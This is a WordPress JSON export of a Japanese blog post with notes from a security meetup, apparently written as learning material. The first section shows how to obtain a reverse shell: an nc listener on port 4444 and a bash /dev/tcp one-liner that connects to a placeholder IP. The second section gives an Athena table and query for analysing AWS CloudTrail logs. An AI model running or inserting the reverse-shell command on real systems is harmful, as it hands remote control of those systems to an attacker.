{"id":3859,"date":"2020-12-13T00:01:23","date_gmt":"2020-12-12T15:01:23","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3859"},"modified":"2020-12-13T00:01:23","modified_gmt":"2020-12-12T15:01:23","slug":"%e3%81%a8%e3%81%82%e3%82%8b%e8%a8%ba%e6%96%ad%e5%93%a1%e3%81%a8security-jaws02-%e3%81%ab%e5%8f%82%e5%8a%a0%e3%81%97%e3%81%9f","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3859","title":{"rendered":"\u3068\u3042\u308b\u8a3a\u65ad\u54e1\u3068Security-JAWS#02 \u306b\u53c2\u52a0\u3057\u305f"},"content":{"rendered":"

\u3068\u3042\u308b\u8a3a\u65ad\u54e1\u3068Security-JAWS#02<\/a>\u306b\u53c2\u52a0\u3057\u305f\u3002
\n\u3068\u3066\u3082\u6709\u76ca\u3060\u3063\u305f\u3002\u77e5\u3089\u306a\u304b\u3063\u305f\u3053\u3068\u3092\u30e1\u30e2\u3059\u308b\u3002<\/p>\n

\u30ea\u30d0\u30fc\u30b9\u30b7\u30a7\u30eb\u596a\u53d6\u65b9\u6cd5<\/h2>\n
\r\n# nc -nlvp 4444\r\nListening on [0.0.0.0] (family 0, port 4444)\r\nConnection from x.x.x.x 62966 received!\r\n<\/pre>\n
\r\n# \/bin\/bash -i >& \/dev\/tcp\/{{IP Address}}\/4444 0>&1\r\n<\/pre>\n
CloudTrail\u3092Athena\u3067\u89e3\u6790\u3059\u308b<\/h2>\n
\r\nCREATE EXTERNAL TABLE `cloudtrail`(\r\n  `eventversion` string COMMENT 'from deserializer', \r\n  `useridentity` struct<type:string,principalid:string,arn:string,accountid:string,invokedby:string,accesskeyid:string,username:string,sessioncontext:struct<attributes:struct<mfaauthenticated:string,creationdate:string>,sessionissuer:struct<type:string,principalid:string,arn:string,accountid:string,username:string>>> COMMENT 'from deserializer', \r\n  `eventtime` string COMMENT 'from deserializer', \r\n  `eventsource` string COMMENT 'from deserializer', \r\n  `eventname` string COMMENT 'from deserializer', \r\n  `awsregion` string COMMENT 'from deserializer', \r\n  `sourceipaddress` string COMMENT 'from deserializer', \r\n  `useragent` string COMMENT 'from deserializer', \r\n  `errorcode` string COMMENT 'from deserializer', \r\n  `errormessage` string COMMENT 'from deserializer', \r\n  `requestparameters` string COMMENT 'from deserializer', \r\n  `responseelements` string COMMENT 'from deserializer', \r\n  `additionaleventdata` string COMMENT 'from deserializer', \r\n  `requestid` string COMMENT 'from deserializer', \r\n  `eventid` string COMMENT 'from deserializer', \r\n  `resources` array<struct<arn:string,accountid:string,type:string>> COMMENT 'from deserializer', \r\n  `eventtype` string COMMENT 'from deserializer', \r\n  `apiversion` string COMMENT 'from deserializer', \r\n  `readonly` string COMMENT 'from deserializer', \r\n  `recipientaccountid` string COMMENT 'from deserializer', \r\n  `serviceeventdetails` string COMMENT 'from deserializer', \r\n  `sharedeventid` string COMMENT 'from deserializer', \r\n  `vpcendpointid` string COMMENT 'from deserializer')\r\nCOMMENT 'CloudTrail table'\r\nROW FORMAT SERDE \r\n  'com.amazon.emr.hive.serde.CloudTrailSerde' \r\nSTORED AS INPUTFORMAT \r\n  'com.amazon.emr.cloudtrail.CloudTrailInputFormat' \r\nOUTPUTFORMAT \r\n  'org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat'\r\nLOCATION\r\n  's3:\/\/{{BucketName}}\/AWSLogs\/{{AWSAccountNum}}\/CloudTrail'\r\nTBLPROPERTIES (\r\n  'classification'='cloudtrail', \r\n  'transient_lastDdlTime'='1601108304')\r\n<\/pre>\n
\r\nSELECT eventTime, eventName, eventSource, awsRegion,sourceIpAddress, userAgent, errorCode, errorMessage,requestParameters, responseElements FROM"default"."cloudtrail" WHERE eventSource = 's3.amazonaws.com' ORDER BY eventTime DESC;\r\n<\/pre>\n
\"\"<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
\u3068\u3042\u308b\u8a3a\u65ad\u54e1\u3068Security-JAWS#02\u306b\u53c2\u52a0\u3057\u305f\u3002 \u3068\u3066\u3082\u6709\u76ca\u3060\u3063\u305f\u3002\u77e5\u3089\u306a\u304b\u3063\u305f\u3053\u3068\u3092\u30e1\u30e2\u3059\u308b\u3002 \u30ea\u30d0\u30fc\u30b9\u30b7\u30a7\u30eb\u596a\u53d6\u65b9\u6cd5 # nc -nlvp 4444 Listening on [0.0.0.0]  […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[27,35],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3859"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3859"}],"version-history":[{"count":1,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3859\/revisions"}],"predecessor-version":[{"id":3861,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3859\/revisions\/3861"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3859"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3859"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3859"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}